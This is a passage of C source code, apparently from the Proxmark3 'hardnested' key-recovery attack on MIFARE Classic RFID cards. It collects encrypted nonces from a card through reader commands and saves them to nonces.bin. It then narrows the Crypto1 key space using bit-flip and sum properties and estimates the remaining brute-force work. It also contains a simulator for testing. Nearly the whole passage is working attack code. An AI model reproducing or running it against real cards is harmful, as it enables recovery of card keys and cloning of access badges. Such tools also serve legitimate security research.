// initialize best_first_bytes, do a rough estimation on remaining states
for (uint16_t i = 0; i < 256; i++) {
num_odd = nonces[i].num_states_bitarray[ODD_STATE];
num_even = nonces[i].num_states_bitarray[EVEN_STATE]; // * (float)nonces[i^0x80].num_states_bitarray[EVEN_STATE] / num_all_bitflips_bitarray[EVEN_STATE];
if ((uint64_t)num_odd * num_even < smallest) {
smallest = (uint64_t)num_odd * num_even;
best_first_byte_smallest_bitarray = i;
}
}
#if defined (DEBUG_REDUCTION)
num_odd = nonces[best_first_byte_smallest_bitarray].num_states_bitarray[ODD_STATE];
num_even = nonces[best_first_byte_smallest_bitarray].num_states_bitarray[EVEN_STATE]; // * (float)nonces[best_first_byte_smallest_bitarray^0x80].num_states_bitarray[EVEN_STATE] / num_all_bitflips_bitarray[EVEN_STATE];
printf("0x%02x: %8d * %8d = %12" PRIu64 " (2^%1.1f)\n", best_first_byte_smallest_bitarray, num_odd, num_even, (uint64_t)num_odd * num_even, log((uint64_t)num_odd * num_even)/log(2.0));
#endif
return (float)smallest/2.0;
}
static void update_expected_brute_force(uint8_t best_byte) {
float total_prob = 0.0;
for (uint8_t i = 0; i < NUM_SUMS; i++) {
total_prob += nonces[best_byte].sum_a8_guess[i].prob;
}
// linear adjust probabilities to result in total_prob = 1.0;
for (uint8_t i = 0; i < NUM_SUMS; i++) {
nonces[best_byte].sum_a8_guess[i].prob /= total_prob;
}
float prob_all_failed = 1.0;
nonces[best_byte].expected_num_brute_force = 0.0;
for (uint8_t i = 0; i < NUM_SUMS; i++) {
nonces[best_byte].expected_num_brute_force += nonces[best_byte].sum_a8_guess[i].prob * (float)nonces[best_byte].sum_a8_guess[i].num_states / 2.0;
prob_all_failed -= nonces[best_byte].sum_a8_guess[i].prob;
nonces[best_byte].expected_num_brute_force += prob_all_failed * (float)nonces[best_byte].sum_a8_guess[i].num_states / 2.0;
}
return;
}
static float sort_best_first_bytes(void)
{
// initialize best_first_bytes, do a rough estimation on remaining states for each Sum_a8 property
// and the expected number of states to brute force
for (uint16_t i = 0; i < 256; i++) {
best_first_bytes[i] = i;
float prob_all_failed = 1.0;
nonces[i].expected_num_brute_force = 0.0;
for (uint8_t j = 0; j < NUM_SUMS; j++) {
nonces[i].sum_a8_guess[j].num_states = estimated_num_states_coarse(sums[first_byte_Sum], sums[nonces[i].sum_a8_guess[j].sum_a8_idx]);
nonces[i].expected_num_brute_force += nonces[i].sum_a8_guess[j].prob * (float)nonces[i].sum_a8_guess[j].num_states / 2.0;
prob_all_failed -= nonces[i].sum_a8_guess[j].prob;
nonces[i].expected_num_brute_force += prob_all_failed * (float)nonces[i].sum_a8_guess[j].num_states / 2.0;
}
}
// sort based on expected number of states to brute force
qsort(best_first_bytes, 256, 1, compare_expected_num_brute_force);
// printf("refine estimations: ");
#define NUM_REFINES 1
// refine scores for the best:
for (uint16_t i = 0; i < NUM_REFINES; i++) {
// printf("%d...", i);
uint16_t first_byte = best_first_bytes[i];
for (uint8_t j = 0; j < NUM_SUMS && nonces[first_byte].sum_a8_guess[j].prob > 0.05; j++) {
nonces[first_byte].sum_a8_guess[j].num_states = estimated_num_states(first_byte, sums[first_byte_Sum], sums[nonces[first_byte].sum_a8_guess[j].sum_a8_idx]);
}
// while (nonces[first_byte].sum_a8_guess[0].num_states == 0
// || nonces[first_byte].sum_a8_guess[1].num_states == 0
// || nonces[first_byte].sum_a8_guess[2].num_states == 0) {
// if (nonces[first_byte].sum_a8_guess[0].num_states == 0) {
// nonces[first_byte].sum_a8_guess[0].prob = 0.0;
// printf("(0x%02x,%d)", first_byte, 0);
// }
// if (nonces[first_byte].sum_a8_guess[1].num_states == 0) {
// nonces[first_byte].sum_a8_guess[1].prob = 0.0;
// printf("(0x%02x,%d)", first_byte, 1);
// }
// if (nonces[first_byte].sum_a8_guess[2].num_states == 0) {
// nonces[first_byte].sum_a8_guess[2].prob = 0.0;
// printf("(0x%02x,%d)", first_byte, 2);
// }
// printf("|");
// qsort(nonces[first_byte].sum_a8_guess, NUM_SUMS, sizeof(guess_sum_a8_t), compare_sum_a8_guess);
// for (uint8_t j = 0; j < NUM_SUMS && nonces[first_byte].sum_a8_guess[j].prob > 0.05; j++) {
// nonces[first_byte].sum_a8_guess[j].num_states = estimated_num_states(first_byte, sums[first_byte_Sum], sums[nonces[first_byte].sum_a8_guess[j].sum_a8_idx]);
// }
// }
// float fix_probs = 0.0;
// for (uint8_t j = 0; j < NUM_SUMS; j++) {
// fix_probs += nonces[first_byte].sum_a8_guess[j].prob;
// }
// for (uint8_t j = 0; j < NUM_SUMS; j++) {
// nonces[first_byte].sum_a8_guess[j].prob /= fix_probs;
// }
// for (uint8_t j = 0; j < NUM_SUMS && nonces[first_byte].sum_a8_guess[j].prob > 0.05; j++) {
// nonces[first_byte].sum_a8_guess[j].num_states = estimated_num_states(first_byte, sums[first_byte_Sum], sums[nonces[first_byte].sum_a8_guess[j].sum_a8_idx]);
// }
float prob_all_failed = 1.0;
nonces[first_byte].expected_num_brute_force = 0.0;
for (uint8_t j = 0; j < NUM_SUMS; j++) {
nonces[first_byte].expected_num_brute_force += nonces[first_byte].sum_a8_guess[j].prob * (float)nonces[first_byte].sum_a8_guess[j].num_states / 2.0;
prob_all_failed -= nonces[first_byte].sum_a8_guess[j].prob;
nonces[first_byte].expected_num_brute_force += prob_all_failed * (float)nonces[first_byte].sum_a8_guess[j].num_states / 2.0;
}
}
// copy best byte to front:
float least_expected_brute_force = (1LL << 48);
uint8_t best_byte = 0;
for (uint16_t i = 0; i < 10; i++) {
uint16_t first_byte = best_first_bytes[i];
if (nonces[first_byte].expected_num_brute_force < least_expected_brute_force) {
least_expected_brute_force = nonces[first_byte].expected_num_brute_force;
best_byte = i;
}
}
if (best_byte != 0) {
// printf("0x%02x <-> 0x%02x", best_first_bytes[0], best_first_bytes[best_byte]);
uint8_t tmp = best_first_bytes[0];
best_first_bytes[0] = best_first_bytes[best_byte];
best_first_bytes[best_byte] = tmp;
}
return nonces[best_first_bytes[0]].expected_num_brute_force;
}
static float update_reduction_rate(float last, bool init)
{
#define QUEUE_LEN 4
static float queue[QUEUE_LEN];
for (uint16_t i = 0; i < QUEUE_LEN-1; i++) {
if (init) {
queue[i] = (float)(1LL << 48);
} else {
queue[i] = queue[i+1];
}
}
if (init) {
queue[QUEUE_LEN-1] = (float)(1LL << 48);
} else {
queue[QUEUE_LEN-1] = last;
}
// linear regression
float avg_y = 0.0;
float avg_x = 0.0;
for (uint16_t i = 0; i < QUEUE_LEN; i++) {
avg_x += i;
avg_y += queue[i];
}
avg_x /= QUEUE_LEN;
avg_y /= QUEUE_LEN;
float dev_xy = 0.0;
float dev_x2 = 0.0;
for (uint16_t i = 0; i < QUEUE_LEN; i++) {
dev_xy += (i - avg_x)*(queue[i] - avg_y);
dev_x2 += (i - avg_x)*(i - avg_x);
}
float reduction_rate = -1.0 * dev_xy / dev_x2; // the negative slope of the linear regression
#if defined (DEBUG_REDUCTION)
printf("update_reduction_rate(%1.0f) = %1.0f per sample, brute_force_per_sample = %1.0f\n", last, reduction_rate, brute_force_per_second * (float)sample_period / 1000.0);
#endif
return reduction_rate;
}
static bool shrink_key_space(float *brute_forces)
{
#if defined(DEBUG_REDUCTION)
printf("shrink_key_space() with stage = 0x%02x\n", hardnested_stage);
#endif
float brute_forces1 = check_smallest_bitflip_bitarrays();
float brute_forces2 = (float)(1LL << 47);
if (hardnested_stage & CHECK_2ND_BYTES) {
brute_forces2 = sort_best_first_bytes();
}
*brute_forces = MIN(brute_forces1, brute_forces2);
float reduction_rate = update_reduction_rate(*brute_forces, false);
return ((hardnested_stage & CHECK_2ND_BYTES)
&& reduction_rate >= 0.0 && reduction_rate < brute_force_per_second * sample_period / 1000.0);
}
static void estimate_sum_a8(void)
{
if (first_byte_num == 256) {
for (uint16_t i = 0; i < 256; i++) {
if (nonces[i].sum_a8_guess_dirty) {
for (uint16_t j = 0; j < NUM_SUMS; j++ ) {
uint16_t sum_a8_idx = nonces[i].sum_a8_guess[j].sum_a8_idx;
nonces[i].sum_a8_guess[j].prob = sum_probability(sum_a8_idx, nonces[i].num, nonces[i].Sum);
}
qsort(nonces[i].sum_a8_guess, NUM_SUMS, sizeof(guess_sum_a8_t), compare_sum_a8_guess);
nonces[i].sum_a8_guess_dirty = false;
}
}
}
}
static int read_nonce_file(void)
{
FILE *fnonces = NULL;
size_t bytes_read;
uint8_t trgBlockNo;
uint8_t trgKeyType;
uint8_t read_buf[9];
uint32_t nt_enc1, nt_enc2;
uint8_t par_enc;
num_acquired_nonces = 0;
if ((fnonces = fopen("nonces.bin","rb")) == NULL) {
PrintAndLog("Could not open file nonces.bin");
return 1;
}
hardnested_print_progress(0, "Reading nonces from file nonces.bin...", (float)(1LL<<47), 0);
bytes_read = fread(read_buf, 1, 6, fnonces);
if (bytes_read != 6) {
PrintAndLog("File reading error.");
fclose(fnonces);
return 1;
}
cuid = bytes_to_num(read_buf, 4);
trgBlockNo = bytes_to_num(read_buf+4, 1);
trgKeyType = bytes_to_num(read_buf+5, 1);
bytes_read = fread(read_buf, 1, 9, fnonces);
while (bytes_read == 9) {
nt_enc1 = bytes_to_num(read_buf, 4);
nt_enc2 = bytes_to_num(read_buf+4, 4);
par_enc = bytes_to_num(read_buf+8, 1);
add_nonce(nt_enc1, par_enc >> 4);
add_nonce(nt_enc2, par_enc & 0x0f);
num_acquired_nonces += 2;
bytes_read = fread(read_buf, 1, 9, fnonces);
}
fclose(fnonces);
char progress_string[80];
sprintf(progress_string, "Read %d nonces from file. cuid=%08x", num_acquired_nonces, cuid);
hardnested_print_progress(num_acquired_nonces, progress_string, (float)(1LL<<47), 0);
sprintf(progress_string, "Target Block=%d, Keytype=%c", trgBlockNo, trgKeyType==0?'A':'B');
hardnested_print_progress(num_acquired_nonces, progress_string, (float)(1LL<<47), 0);
for (uint16_t i = 0; i < NUM_SUMS; i++) {
if (first_byte_Sum == sums[i]) {
first_byte_Sum = i;
break;
}
}
return 0;
}
noncelistentry_t *SearchFor2ndByte(uint8_t b1, uint8_t b2)
{
noncelistentry_t *p = nonces[b1].first;
while (p != NULL) {
if ((p->nonce_enc >> 16 & 0xff) == b2) {
return p;
}
p = p->next;
}
return NULL;
}
static bool timeout(void)
{
return (msclock() > last_sample_clock + sample_period);
}
static void *check_for_BitFlipProperties_thread(void *args)
{
uint8_t first_byte = ((uint8_t *)args)[0];
uint8_t last_byte = ((uint8_t *)args)[1];
uint8_t time_budget = ((uint8_t *)args)[2];
if (hardnested_stage & CHECK_1ST_BYTES) {
// for (uint16_t bitflip = 0x001; bitflip < 0x200; bitflip++) {
for (uint16_t bitflip_idx = 0; bitflip_idx < num_1st_byte_effective_bitflips; bitflip_idx++) {
uint16_t bitflip = all_effective_bitflip[bitflip_idx];
if (time_budget & timeout()) {
#if defined (DEBUG_REDUCTION)
printf("break at bitflip_idx %d...", bitflip_idx);
#endif
return NULL;
}
for (uint16_t i = first_byte; i <= last_byte; i++) {
if (nonces[i].BitFlips[bitflip] == 0 && nonces[i].BitFlips[bitflip ^ 0x100] == 0
&& nonces[i].first != NULL && nonces[i^(bitflip&0xff)].first != NULL) {
uint8_t parity1 = (nonces[i].first->par_enc) >> 3; // parity of first byte
uint8_t parity2 = (nonces[i^(bitflip&0xff)].first->par_enc) >> 3; // parity of nonce with bits flipped
if ((parity1 == parity2 && !(bitflip & 0x100)) // bitflip
|| (parity1 != parity2 && (bitflip & 0x100))) { // not bitflip
nonces[i].BitFlips[bitflip] = 1;
for (odd_even_t odd_even = EVEN_STATE; odd_even <= ODD_STATE; odd_even++) {
if (bitflip_bitarrays[odd_even][bitflip] != NULL) {
uint32_t old_count = nonces[i].num_states_bitarray[odd_even];
nonces[i].num_states_bitarray[odd_even] = count_bitarray_AND(nonces[i].states_bitarray[odd_even], bitflip_bitarrays[odd_even][bitflip]);
if (nonces[i].num_states_bitarray[odd_even] != old_count) {
nonces[i].all_bitflips_dirty[odd_even] = true;
}
// printf("bitflip: %d old: %d, new: %d ", bitflip, old_count, nonces[i].num_states_bitarray[odd_even]);
}
}
}
}
}
((uint8_t *)args)[1] = num_1st_byte_effective_bitflips - bitflip_idx - 1; // bitflips still to go in stage 1
}
}
((uint8_t *)args)[1] = 0; // stage 1 definitely completed
if (hardnested_stage & CHECK_2ND_BYTES) {
for (uint16_t bitflip_idx = num_1st_byte_effective_bitflips; bitflip_idx < num_all_effective_bitflips; bitflip_idx++) {
uint16_t bitflip = all_effective_bitflip[bitflip_idx];
if (time_budget & timeout()) {
#if defined (DEBUG_REDUCTION)
printf("break at bitflip_idx %d...", bitflip_idx);
#endif
return NULL;
}
for (uint16_t i = first_byte; i <= last_byte; i++) {
// Check for Bit Flip Property of 2nd bytes
if (nonces[i].BitFlips[bitflip] == 0) {
for (uint16_t j = 0; j < 256; j++) { // for each 2nd Byte
noncelistentry_t *byte1 = SearchFor2ndByte(i, j);
noncelistentry_t *byte2 = SearchFor2ndByte(i, j^(bitflip&0xff));
if (byte1 != NULL && byte2 != NULL) {
uint8_t parity1 = byte1->par_enc >> 2 & 0x01; // parity of 2nd byte
uint8_t parity2 = byte2->par_enc >> 2 & 0x01; // parity of 2nd byte with bits flipped
if ((parity1 == parity2 && !(bitflip&0x100)) // bitflip
|| (parity1 != parity2 && (bitflip&0x100))) { // not bitflip
nonces[i].BitFlips[bitflip] = 1;
for (odd_even_t odd_even = EVEN_STATE; odd_even <= ODD_STATE; odd_even++) {
if (bitflip_bitarrays[odd_even][bitflip] != NULL) {
uint32_t old_count = nonces[i].num_states_bitarray[odd_even];
nonces[i].num_states_bitarray[odd_even] = count_bitarray_AND(nonces[i].states_bitarray[odd_even], bitflip_bitarrays[odd_even][bitflip]);
if (nonces[i].num_states_bitarray[odd_even] != old_count) {
nonces[i].all_bitflips_dirty[odd_even] = true;
}
}
}
break;
}
}
}
}
// printf("states_bitarray[0][%" PRIu16 "] contains %d ones.\n", i, count_states(nonces[i].states_bitarray[EVEN_STATE]));
// printf("states_bitarray[1][%" PRIu16 "] contains %d ones.\n", i, count_states(nonces[i].states_bitarray[ODD_STATE]));
}
}
}
return NULL;
}
static void check_for_BitFlipProperties(bool time_budget)
{
// create and run worker threads
pthread_t thread_id[NUM_CHECK_BITFLIPS_THREADS];
uint8_t args[NUM_CHECK_BITFLIPS_THREADS][3];
uint16_t bytes_per_thread = (256 + (NUM_CHECK_BITFLIPS_THREADS/2)) / NUM_CHECK_BITFLIPS_THREADS;
for (uint8_t i = 0; i < NUM_CHECK_BITFLIPS_THREADS; i++) {
args[i][0] = i * bytes_per_thread;
args[i][1] = MIN(args[i][0]+bytes_per_thread-1, 255);
args[i][2] = time_budget;
}
args[NUM_CHECK_BITFLIPS_THREADS-1][1] = MAX(args[NUM_CHECK_BITFLIPS_THREADS-1][1], 255);
// start threads
for (uint8_t i = 0; i < NUM_CHECK_BITFLIPS_THREADS; i++) {
pthread_create(&thread_id[i], NULL, check_for_BitFlipProperties_thread, args[i]);
}
// wait for threads to terminate:
for (uint8_t i = 0; i < NUM_CHECK_BITFLIPS_THREADS; i++) {
pthread_join(thread_id[i], NULL);
}
if (hardnested_stage & CHECK_2ND_BYTES) {
hardnested_stage &= ~CHECK_1ST_BYTES; // we are done with 1st stage, except...
for (uint16_t i = 0; i < NUM_CHECK_BITFLIPS_THREADS; i++) {
if (args[i][1] != 0) {
hardnested_stage |= CHECK_1ST_BYTES; // ... when any of the threads didn't complete in time
break;
}
}
}
#if defined (DEBUG_REDUCTION)
if (hardnested_stage & CHECK_1ST_BYTES) printf("stage 1 not completed yet\n");
#endif
}
static void update_nonce_data(bool time_budget)
{
check_for_BitFlipProperties(time_budget);
update_allbitflips_array();
update_sum_bitarrays(EVEN_STATE);
update_sum_bitarrays(ODD_STATE);
update_p_K();
estimate_sum_a8();
}
static void apply_sum_a0(void)
{
uint32_t old_count = num_all_bitflips_bitarray[EVEN_STATE];
num_all_bitflips_bitarray[EVEN_STATE] = count_bitarray_AND(all_bitflips_bitarray[EVEN_STATE], sum_a0_bitarrays[EVEN_STATE][first_byte_Sum]);
if (num_all_bitflips_bitarray[EVEN_STATE] != old_count) {
all_bitflips_bitarray_dirty[EVEN_STATE] = true;
}
old_count = num_all_bitflips_bitarray[ODD_STATE];
num_all_bitflips_bitarray[ODD_STATE] = count_bitarray_AND(all_bitflips_bitarray[ODD_STATE], sum_a0_bitarrays[ODD_STATE][first_byte_Sum]);
if (num_all_bitflips_bitarray[ODD_STATE] != old_count) {
all_bitflips_bitarray_dirty[ODD_STATE] = true;
}
}
static void simulate_MFplus_RNG(uint32_t test_cuid, uint64_t test_key, uint32_t *nt_enc, uint8_t *par_enc)
{
struct Crypto1State sim_cs = {0, 0};
// init cryptostate with key:
for(int8_t i = 47; i > 0; i -= 2) {
sim_cs.odd = sim_cs.odd << 1 | BIT(test_key, (i - 1) ^ 7);
sim_cs.even = sim_cs.even << 1 | BIT(test_key, i ^ 7);
}
*par_enc = 0;
uint32_t nt = (rand() & 0xff) << 24 | (rand() & 0xff) << 16 | (rand() & 0xff) << 8 | (rand() & 0xff);
for (int8_t byte_pos = 3; byte_pos >= 0; byte_pos--) {
uint8_t nt_byte_dec = (nt >> (8*byte_pos)) & 0xff;
uint8_t nt_byte_enc = crypto1_byte(&sim_cs, nt_byte_dec ^ (test_cuid >> (8*byte_pos)), false) ^ nt_byte_dec; // encode the nonce byte
*nt_enc = (*nt_enc << 8) | nt_byte_enc;
uint8_t ks_par = filter(sim_cs.odd); // the keystream bit to encode/decode the parity bit
uint8_t nt_byte_par_enc = ks_par ^ oddparity8(nt_byte_dec); // determine the nt byte's parity and encode it
*par_enc = (*par_enc << 1) | nt_byte_par_enc;
}
}
static void simulate_acquire_nonces()
{
time_t time1 = time(NULL);
last_sample_clock = 0;
sample_period = 1000; // for simulation
hardnested_stage = CHECK_1ST_BYTES;
bool acquisition_completed = false;
uint32_t total_num_nonces = 0;
float brute_force;
bool reported_suma8 = false;
cuid = (rand() & 0xff) << 24 | (rand() & 0xff) << 16 | (rand() & 0xff) << 8 | (rand() & 0xff);
if (known_target_key == -1) {
known_target_key = ((uint64_t)rand() & 0xfff) << 36 | ((uint64_t)rand() & 0xfff) << 24 | ((uint64_t)rand() & 0xfff) << 12 | ((uint64_t)rand() & 0xfff);
}
char progress_text[80];
sprintf(progress_text, "Simulating key %012" PRIx64 ", cuid %08" PRIx32 " ...", known_target_key, cuid);
hardnested_print_progress(0, progress_text, (float)(1LL<<47), 0);
fprintf(fstats, "%012" PRIx64 ";%" PRIx32 ";", known_target_key, cuid);
num_acquired_nonces = 0;
do {
uint32_t nt_enc = 0;
uint8_t par_enc = 0;
for (uint16_t i = 0; i < 113; i++) {
simulate_MFplus_RNG(cuid, known_target_key, &nt_enc, &par_enc);
num_acquired_nonces += add_nonce(nt_enc, par_enc);
total_num_nonces++;
}
last_sample_clock = msclock();
if (first_byte_num == 256 ) {
if (hardnested_stage == CHECK_1ST_BYTES) {
for (uint16_t i = 0; i < NUM_SUMS; i++) {
if (first_byte_Sum == sums[i]) {
first_byte_Sum = i;
break;
}
}
hardnested_stage |= CHECK_2ND_BYTES;
apply_sum_a0();
}
update_nonce_data(true);
acquisition_completed = shrink_key_space(&brute_force);
if (!reported_suma8) {
char progress_string[80];
sprintf(progress_string, "Apply Sum property. Sum(a0) = %d", sums[first_byte_Sum]);
hardnested_print_progress(num_acquired_nonces, progress_string, brute_force, 0);
reported_suma8 = true;
} else {
hardnested_print_progress(num_acquired_nonces, "Apply bit flip properties", brute_force, 0);
}
} else {
update_nonce_data(true);
acquisition_completed = shrink_key_space(&brute_force);
hardnested_print_progress(num_acquired_nonces, "Apply bit flip properties", brute_force, 0);
}
} while (!acquisition_completed);
time_t end_time = time(NULL);
// PrintAndLog("Acquired a total of %" PRId32" nonces in %1.0f seconds (%1.0f nonces/minute)",
// num_acquired_nonces,
// difftime(end_time, time1),
// difftime(end_time, time1)!=0.0?(float)total_num_nonces*60.0/difftime(end_time, time1):INFINITY
// );
fprintf(fstats, "%" PRId32 ";%" PRId32 ";%1.0f;", total_num_nonces, num_acquired_nonces, difftime(end_time,time1));
}
static int acquire_nonces(uint8_t blockNo, uint8_t keyType, uint8_t *key, uint8_t trgBlockNo, uint8_t trgKeyType, bool nonce_file_write, bool slow)
{
last_sample_clock = msclock();
sample_period = 2000; // initial rough estimate. Will be refined.
bool initialize = true;
bool field_off = false;
hardnested_stage = CHECK_1ST_BYTES;
bool acquisition_completed = false;
uint32_t flags = 0;
uint8_t write_buf[9];
uint32_t total_num_nonces = 0;
float brute_force;
bool reported_suma8 = false;
FILE *fnonces = NULL;
UsbCommand resp;
num_acquired_nonces = 0;
clearCommandBuffer();
do {
flags = 0;
flags |= initialize ? 0x0001 : 0;
flags |= slow ? 0x0002 : 0;
flags |= field_off ? 0x0004 : 0;
UsbCommand c = {CMD_MIFARE_ACQUIRE_ENCRYPTED_NONCES, {blockNo + keyType * 0x100, trgBlockNo + trgKeyType * 0x100, flags}};
memcpy(c.d.asBytes, key, 6);
clearCommandBuffer();
SendCommand(&c);
if (field_off) break;
if (initialize) {
if (!WaitForResponseTimeout(CMD_ACK, &resp, 3000)) {
//strange second call (iceman)
UsbCommand c = {CMD_MIFARE_ACQUIRE_ENCRYPTED_NONCES, {blockNo + keyType * 0x100, trgBlockNo + trgKeyType * 0x100, 4}};
clearCommandBuffer();
SendCommand(&c);
return 1;
}
if (resp.arg[0]) return resp.arg[0]; // error during nested_hard
cuid = resp.arg[1];
if (nonce_file_write && fnonces == NULL) {
if ((fnonces = fopen("nonces.bin","wb")) == NULL) {
PrintAndLog("Could not create file nonces.bin");
return 3;
}
hardnested_print_progress(0, "Writing acquired nonces to binary file nonces.bin", (float)(1LL<<47), 0);
num_to_bytes(cuid, 4, write_buf);
fwrite(write_buf, 1, 4, fnonces);
fwrite(&trgBlockNo, 1, 1, fnonces);
fwrite(&trgKeyType, 1, 1, fnonces);
fflush(fnonces);
}
}
if (!initialize) {
uint32_t nt_enc1, nt_enc2;
uint8_t par_enc;
uint16_t num_sampled_nonces = resp.arg[2];
uint8_t *bufp = resp.d.asBytes;
for (uint16_t i = 0; i < num_sampled_nonces; i+=2) {
nt_enc1 = bytes_to_num(bufp, 4);
nt_enc2 = bytes_to_num(bufp+4, 4);
par_enc = bytes_to_num(bufp+8, 1);
//printf("Encrypted nonce: %08x, encrypted_parity: %02x\n", nt_enc1, par_enc >> 4);
num_acquired_nonces += add_nonce(nt_enc1, par_enc >> 4);
//printf("Encrypted nonce: %08x, encrypted_parity: %02x\n", nt_enc2, par_enc & 0x0f);
num_acquired_nonces += add_nonce(nt_enc2, par_enc & 0x0f);
if (nonce_file_write) {
fwrite(bufp, 1, 9, fnonces);
fflush(fnonces);
}
bufp += 9;
}
total_num_nonces += num_sampled_nonces;
if (first_byte_num == 256 ) {
if (hardnested_stage == CHECK_1ST_BYTES) {
for (uint16_t i = 0; i < NUM_SUMS; i++) {
if (first_byte_Sum == sums[i]) {
first_byte_Sum = i;
break;
}
}
hardnested_stage |= CHECK_2ND_BYTES;
apply_sum_a0();
}
update_nonce_data(true);
acquisition_completed = shrink_key_space(&brute_force);
if (!reported_suma8) {
char progress_string[80];
sprintf(progress_string, "Apply Sum property. Sum(a0) = %d", sums[first_byte_Sum]);
hardnested_print_progress(num_acquired_nonces, progress_string, brute_force, 0);
reported_suma8 = true;
} else {
hardnested_print_progress(num_acquired_nonces, "Apply bit flip properties", brute_force, 0);
}
} else {
update_nonce_data(true);
acquisition_completed = shrink_key_space(&brute_force);
hardnested_print_progress(num_acquired_nonces, "Apply bit flip properties", brute_force, 0);
}
}
if (acquisition_completed) {
field_off = true; // switch off field with next SendCommand and then finish
}
if (!initialize) {
if (!WaitForResponseTimeout(CMD_ACK, &resp, 3000)) {
if (nonce_file_write) {
fclose(fnonces);
}
return 1;
}
if (resp.arg[0]) {
if (nonce_file_write) {
fclose(fnonces);
}
return resp.arg[0]; // error during nested_hard
}
}
initialize = false;
if (msclock() - last_sample_clock < sample_period) {
sample_period = msclock() - last_sample_clock;
}
last_sample_clock = msclock();
} while (!acquisition_completed || field_off);
if (nonce_file_write) {
fclose(fnonces);
}
// PrintAndLog("Sampled a total of %d nonces in %d seconds (%0.0f nonces/minute)",
// total_num_nonces,
// time(NULL)-time1,
// (float)total_num_nonces*60.0/(time(NULL)-time1));
return 0;
}
static inline bool invariant_holds(uint_fast8_t byte_diff, uint_fast32_t state1, uint_fast32_t state2, uint_fast8_t bit, uint_fast8_t state_bit)
{
uint_fast8_t j_1_bit_mask = 0x01 << (bit-1);
uint_fast8_t bit_diff = byte_diff & j_1_bit_mask; // difference of (j-1)th bit
uint_fast8_t filter_diff = filter(state1 >> (4-state_bit)) ^ filter(state2 >> (4-state_bit)); // difference in filter function
uint_fast8_t mask_y12_y13 = 0xc0 >> state_bit;
uint_fast8_t state_bits_diff = (state1 ^ state2) & mask_y12_y13; // difference in state bits 12 and 13
uint_fast8_t all_diff = evenparity8(bit_diff ^ state_bits_diff ^ filter_diff); // use parity function to XOR all bits
return !all_diff;
}
static inline bool invalid_state(uint_fast8_t byte_diff, uint_fast32_t state1, uint_fast32_t state2, uint_fast8_t bit, uint_fast8_t state_bit)
{
uint_fast8_t j_bit_mask = 0x01 << bit;
uint_fast8_t bit_diff = byte_diff & j_bit_mask; // difference of jth bit
uint_fast8_t mask_y13_y16 = 0x48 >> state_bit;
uint_fast8_t state_bits_diff = (state1 ^ state2) & mask_y13_y16; // difference in state bits 13 and 16
uint_fast8_t all_diff = evenparity8(bit_diff ^ state_bits_diff); // use parity function to XOR all bits
return all_diff;
}
static inline bool remaining_bits_match(uint_fast8_t num_common_bits, uint_fast8_t byte_diff, uint_fast32_t state1, uint_fast32_t state2, odd_even_t odd_even)
{
if (odd_even) {
// odd bits
switch (num_common_bits) {
case 0: if (!invariant_holds(byte_diff, state1, state2, 1, 0)) return true;
case 1: if (invalid_state(byte_diff, state1, state2, 1, 0)) return false;
case 2: if (!invariant_holds(byte_diff, state1, state2, 3, 1)) return true;
case 3: if (invalid_state(byte_diff, state1, state2, 3, 1)) return false;
case 4: if (!invariant_holds(byte_diff, state1, state2, 5, 2)) return true;
case 5: if (invalid_state(byte_diff, state1, state2, 5, 2)) return false;
case 6: if (!invariant_holds(byte_diff, state1, state2, 7, 3)) return true;
case 7: if (invalid_state(byte_diff, state1, state2, 7, 3)) return false;
}
} else {
// even bits
switch (num_common_bits) {
case 0: if (invalid_state(byte_diff, state1, state2, 0, 0)) return false;
case 1: if (!invariant_holds(byte_diff, state1, state2, 2, 1)) return true;
case 2: if (invalid_state(byte_diff, state1, state2, 2, 1)) return false;
case 3: if (!invariant_holds(byte_diff, state1, state2, 4, 2)) return true;
case 4: if (invalid_state(byte_diff, state1, state2, 4, 2)) return false;
case 5: if (!invariant_holds(byte_diff, state1, state2, 6, 3)) return true;
case 6: if (invalid_state(byte_diff, state1, state2, 6, 3)) return false;
}
}
return true; // valid state
}
static pthread_mutex_t statelist_cache_mutex = PTHREAD_MUTEX_INITIALIZER;
static pthread_mutex_t book_of_work_mutex = PTHREAD_MUTEX_INITIALIZER;
typedef enum {
TO_BE_DONE,
WORK_IN_PROGRESS,
COMPLETED
} work_status_t;
static struct sl_cache_entry {
uint32_t *sl;
uint32_t len;
work_status_t cache_status;
} sl_cache[NUM_PART_SUMS][NUM_PART_SUMS][2];
static void init_statelist_cache(void)
{
pthread_mutex_lock(&statelist_cache_mutex);
for (uint16_t i = 0; i < NUM_PART_SUMS; i++) {
for (uint16_t j = 0; j < NUM_PART_SUMS; j++) {
for (uint16_t k = 0; k < 2; k++) {
sl_cache[i][j][k].sl = NULL;
sl_cache[i][j][k].len = 0;
sl_cache[i][j][k].cache_status = TO_BE_DONE;
}
}
}
pthread_mutex_unlock(&statelist_cache_mutex);
}
static void free_statelist_cache(void)
{
pthread_mutex_lock(&statelist_cache_mutex);
for (uint16_t i = 0; i < NUM_PART_SUMS; i++) {
for (uint16_t j = 0; j < NUM_PART_SUMS; j++) {
for (uint16_t k = 0; k < 2; k++) {
free(sl_cache[i][j][k].sl);
}
}
}
pthread_mutex_unlock(&statelist_cache_mutex);
}
#ifdef DEBUG_KEY_ELIMINATION
static inline bool bitflips_match(uint8_t byte, uint32_t state, odd_even_t odd_even, bool quiet)
#else
static inline bool bitflips_match(uint8_t byte, uint32_t state, odd_even_t odd_even)
#endif
{
uint32_t *bitset = nonces[byte].states_bitarray[odd_even];
bool possible = test_bit24(bitset, state);
if (!possible) {
#ifdef DEBUG_KEY_ELIMINATION
if (!quiet && known_target_key != -1 && state == test_state[odd_even]) {
printf("Initial state lists: %s test state eliminated by bitflip property.\n", odd_even==EVEN_STATE?"even":"odd");
sprintf(failstr, "Initial %s Byte Bitflip property", odd_even==EVEN_STATE?"even":"odd");
}
#endif
return false;
} else {
return true;
}
}
static uint_fast8_t reverse(uint_fast8_t byte)
{
uint_fast8_t rev_byte = 0;
for (uint8_t i = 0; i < 8; i++) {
rev_byte <<= 1;
rev_byte |= (byte >> i) & 0x01;
}
return rev_byte;
}
static bool all_bitflips_match(uint8_t byte, uint32_t state, odd_even_t odd_even)
{
uint32_t masks[2][8] = {{0x00fffff0, 0x00fffff8, 0x00fffff8, 0x00fffffc, 0x00fffffc, 0x00fffffe, 0x00fffffe, 0x00ffffff},
{0x00fffff0, 0x00fffff0, 0x00fffff8, 0x00fffff8, 0x00fffffc, 0x00fffffc, 0x00fffffe, 0x00fffffe} };
for (uint16_t i = 1; i < 256; i++) {
uint_fast8_t bytes_diff = reverse(i); // start with most common bits
uint_fast8_t byte2 = byte ^ bytes_diff;
uint_fast8_t num_common = trailing_zeros(bytes_diff);
